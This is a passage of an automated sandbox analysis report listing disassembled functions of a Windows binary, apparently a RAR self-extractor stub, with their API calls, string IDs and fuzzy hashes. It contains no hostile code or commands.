                • Instruction Fuzzy Hash: 5831603290020DAFDB209A79DA85B7B73E9FF00354F14846FE649DB651DF39AC409758
                Function 004ECD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                Download Yara Rule
                APIs
                • GetWindow.USER32(?,00000005), ref: 004ECD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 004ECD7D
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 004ECD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004ECDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 004ECDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004ECDED
                • DeleteObject.GDI32(00000000), ref: 004ECDF4
                • GetWindow.USER32(00000000,00000002), ref: 004ECDFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: fd5d316b31313868e10520dfc5b8ca0ce8aaac58d8b8569c7a0aa6a7f0910449
                • Instruction ID: 85ced9e723d1f9a12814ea8e75c686f84e155949566d9e06a9df77fb14e6624f
                • Opcode Fuzzy Hash: fd5d316b31313868e10520dfc5b8ca0ce8aaac58d8b8569c7a0aa6a7f0910449
                • Instruction Fuzzy Hash: 0B113A32540790BBE3206B639C49FAF365CFF60742F004526FB42A12D2CA688D1A96B8
                Function 004F8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 004F8EC5
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004F8ED1
                • _free.LIBCMT ref: 004F8EDC
                • _free.LIBCMT ref: 004F8EE7
                • _free.LIBCMT ref: 004F8EF2
                • _free.LIBCMT ref: 004F8EFD
                • _free.LIBCMT ref: 004F8F08
                • _free.LIBCMT ref: 004F8F13
                • _free.LIBCMT ref: 004F8F1E
                • _free.LIBCMT ref: 004F8F2C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: bfec2d1d80144fc5a7ef120d6bc738a2d3b049bb9365854912f9cf9aeac35dac
                • Instruction ID: d844d96cd09ff4a1f5578f5ec6df4135eb1bd7284d6d10f6f3839f9f45fad186
                • Opcode Fuzzy Hash: bfec2d1d80144fc5a7ef120d6bc738a2d3b049bb9365854912f9cf9aeac35dac
                • Instruction Fuzzy Hash: 8711A47650010DBFCB11EF56C842CEE3BA5FF04354B5140AEBA088F666EA35DA51DB84
                Function 004D2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: a867b7818baea685e204cbe9e421c60ff5d4f63b0c2ea3d665c946282f6fa5f6
                • Instruction ID: 0fbc14220c85f0e47bb87793a6451850caa299db7a176201169b36f75b89f648
                • Opcode Fuzzy Hash: a867b7818baea685e204cbe9e421c60ff5d4f63b0c2ea3d665c946282f6fa5f6
                • Instruction Fuzzy Hash: 58F116706042419BDB25DF358AF5BEF77996FA0304F08456FF8858B382DAACD844C76A
                Function 004EACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EAD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 004EAD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004EAD60
                • SetWindowTextW.USER32(?,?), ref: 004EAD71
                • GetDlgItem.USER32(?,00000065), ref: 004EAD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004EAD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004EADA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: 9d27145d90da42ee6ab3d3a17cf952c50c08062ac492ce24d1c4a1f79e590cfe
                • Instruction ID: 88b71a6041b5ff578f724b2e8614c36589f6e017085116ffddba5d2c0d571b14
                • Opcode Fuzzy Hash: 9d27145d90da42ee6ab3d3a17cf952c50c08062ac492ce24d1c4a1f79e590cfe
                • Instruction Fuzzy Hash: F4212831244104BBE2255F73ED4DE7B3F6DEB66B47F00400AF600A26A0CB666D19F636
                Function 004D9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D9448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004D946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004D948A
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • _swprintf.LIBCMT ref: 004D9526
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • MoveFileW.KERNEL32(?,?), ref: 004D9595
                • MoveFileW.KERNEL32(?,?), ref: 004D95D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: 07c46e8ed86b259a3cf225c5a23c6e21fe94e1828d2e2e1d03568cb1c8a527bc
                • Instruction ID: 6ba96846438b68e4a619d21ccac74908031f5127e39bc7aaf94152e69bfe06ea
                • Opcode Fuzzy Hash: 07c46e8ed86b259a3cf225c5a23c6e21fe94e1828d2e2e1d03568cb1c8a527bc
                • Instruction Fuzzy Hash: 2E416F71900158B6CB30EB61CCA5ADF737CEF11784F0444ABB549E3241EB389F898BA8
                Function 004E8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                Download Yara Rule
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 004E8F38
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004E8F59
                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 004E8F80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Global$AllocByteCharCreateMultiStreamWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 4094277203-4209811716
                • Opcode ID: be176102130abdbaa7106c562b4c9b6e36203731cfde999f4cc88a9061af5877
                • Instruction ID: fff6b9993723b3ce35e7acad0aa859a3c35ab604369a597b43660301f8f8d9e2
                • Opcode Fuzzy Hash: be176102130abdbaa7106c562b4c9b6e36203731cfde999f4cc88a9061af5877
                • Instruction Fuzzy Hash: A0314A315083557BDB10AB369C42FAF7B98EF91725F04011FFA05A62C1EF6C9909C3A9
                Function 004F8FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                • _free.LIBCMT ref: 004F8FDC
                • _free.LIBCMT ref: 004F9004
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F9011
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                • _abort.LIBCMT ref: 004F9023
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID: XP
                • API String ID: 3160817290-3026131541
                • Opcode ID: fd612b66466b894f79017848a343cc4f5e17f29e6f7d06136ed6232d33c9d08e
                • Instruction ID: 0c1e1be806a8cfd35f071f099b104a802afa6de0a6ac6e576d1367963d0e8a7d
                • Opcode Fuzzy Hash: fd612b66466b894f79017848a343cc4f5e17f29e6f7d06136ed6232d33c9d08e
                • Instruction Fuzzy Hash: 05F0F436505A097FC31133267C0AB3F2A1A9BE1764F34011FF715DA292EE2C8D02642D
                Function 004E0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                Download Yara Rule
                APIs
                • __aulldiv.LIBCMT ref: 004E0A9D
                  • Part of subcall function 004DACF5: GetVersionExW.KERNEL32(?), ref: 004DAD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004E0AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004E0AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004E0AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004E0B3D
                • __aullrem.LIBCMT ref: 004E0BCB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 2d54bd609c0a46f8522e9d69cdbfa66cc5afc2285661e4cf67ea3e0ddffd8c7c
                • Instruction ID: bf077ec8484ee407dcad51975b986eb4ef42288a886170130dcc33ccdd3fa090
                • Opcode Fuzzy Hash: 2d54bd609c0a46f8522e9d69cdbfa66cc5afc2285661e4cf67ea3e0ddffd8c7c
                • Instruction Fuzzy Hash: 4D413AB14083059FC310DF65C88496BB7F8FB88715F00492FF59692650E778E648CB55
                Function 004FEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,004FF5A2,?,00000000,?,00000000,00000000), ref: 004FEE6F
                • __fassign.LIBCMT ref: 004FEEEA
                • __fassign.LIBCMT ref: 004FEF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 004FEF2B
                • WriteFile.KERNEL32(?,?,00000000,004FF5A2,00000000,?,?,?,?,?,?,?,?,?,004FF5A2,?), ref: 004FEF4A
                • WriteFile.KERNEL32(?,?,00000001,004FF5A2,00000000,?,?,?,?,?,?,?,?,?,004FF5A2,?), ref: 004FEF83
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 1133944b2ce2f6c30efd9f8ee248c4861c40339087e550b412b93eaf887f7d77
                • Instruction ID: 99b78a8eedeb3839e7e08fda36d2dde66e97b78096eb54b6b45f19c4dacdb19e
                • Opcode Fuzzy Hash: 1133944b2ce2f6c30efd9f8ee248c4861c40339087e550b412b93eaf887f7d77
                • Instruction Fuzzy Hash: 1E51D571A00209AFCB10CFAADC45AFEBBF9EF19301F14411BEA51E72A1D7349A41CB64
                Function 004EC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                Download Yara Rule
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 004EC54A
                • _swprintf.LIBCMT ref: 004EC57E
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • SetDlgItemTextW.USER32(?,00000066,0051946A), ref: 004EC59E
                • _wcschr.LIBVCRUNTIME ref: 004EC5D1
                • EndDialog.USER32(?,00000001), ref: 004EC6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: b743fb9ac6b49fd9a15b74e3a6c0f91ee27727d2f369d879551de089011b4545
                • Instruction ID: 6c1868766bb0be154323ca1d4febde8ef6baaeb96d56518a9c794702fe542dce
                • Opcode Fuzzy Hash: b743fb9ac6b49fd9a15b74e3a6c0f91ee27727d2f369d879551de089011b4545
                • Instruction Fuzzy Hash: D641B371D00658AADF26DBA1CC85FEB77BCAB18306F0040A7E509D61A0E7799AC9CB54
                Function 004E9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(?,00000000), ref: 004E964E
                • GetWindowRect.USER32(?,00000000), ref: 004E9693
                • ShowWindow.USER32(?,00000005,00000000), ref: 004E972A
                • SetWindowTextW.USER32(?,00000000), ref: 004E9732
                • ShowWindow.USER32(00000000,00000005), ref: 004E9748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: 643f9fee4f434dda482601dcc0830ff3a7514750d52ba79406ba3790d19dfcbe
                • Instruction ID: c4b4ba54f83c496dd036ac2b1895238b9e89f8414652da9be8e4a04a39b80b47
                • Opcode Fuzzy Hash: 643f9fee4f434dda482601dcc0830ff3a7514750d52ba79406ba3790d19dfcbe
                • Instruction Fuzzy Hash: 9E31E331404254EFCB519F66DD48B6B7BA8FF48702F00855AFE499A392CB38DC09DB69
                Function 004FBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 004FBF79: _free.LIBCMT ref: 004FBFA2
                • _free.LIBCMT ref: 004FC003
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FC00E
                • _free.LIBCMT ref: 004FC019
                • _free.LIBCMT ref: 004FC06D
                • _free.LIBCMT ref: 004FC078
                • _free.LIBCMT ref: 004FC083
                • _free.LIBCMT ref: 004FC08E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: c042b09d659738e772df385f09c839cfb0b3569c83f6ee3b9ced5ab167f97275
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: F111217154070DF6D620B7B1CC06FE7B79DAF01704F40881E7799AA552DB69F9048AE4
                Function 004F20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,004F20C1,004EFB12), ref: 004F20D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004F20E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004F20FF
                • SetLastError.KERNEL32(00000000,?,004F20C1,004EFB12), ref: 004F2151
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: f15bbac7497c35fa57fecec961433480fbf2e686b747d3dd8c8aaaa6eb8d7b8b
                • Instruction ID: 5fb683b91907b06235b1e3f13026f3ea197dc9b4008022c5e0670b0fcb5999f4
                • Opcode Fuzzy Hash: f15bbac7497c35fa57fecec961433480fbf2e686b747d3dd8c8aaaa6eb8d7b8b
                • Instruction Fuzzy Hash: E701D83210971A6EE7542FB6BF8653F2A48EB217797310B2FF710552E0EF9A4C09614C
                Function 004F9029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,004F895F,004F85FB,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F902E
                • _free.LIBCMT ref: 004F9063
                • _free.LIBCMT ref: 004F908A
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F9097
                • SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F90A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID: XP
                • API String ID: 3170660625-3026131541
                • Opcode ID: 84fd8cc7a44d0be70e83543e45db172eb967a3fbb5a7301ab00aa0e7ad00008f
                • Instruction ID: 2c033028d422f4c6a9d85ea0f7636bd42099eca2bdfd5bceff4b780885aa3bfb
                • Opcode Fuzzy Hash: 84fd8cc7a44d0be70e83543e45db172eb967a3fbb5a7301ab00aa0e7ad00008f
                • Instruction Fuzzy Hash: 4801D176506A086ED32227366C8AB3B365DABD0375734002FF709E2352EE6C8C06616E
                Function 004EDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
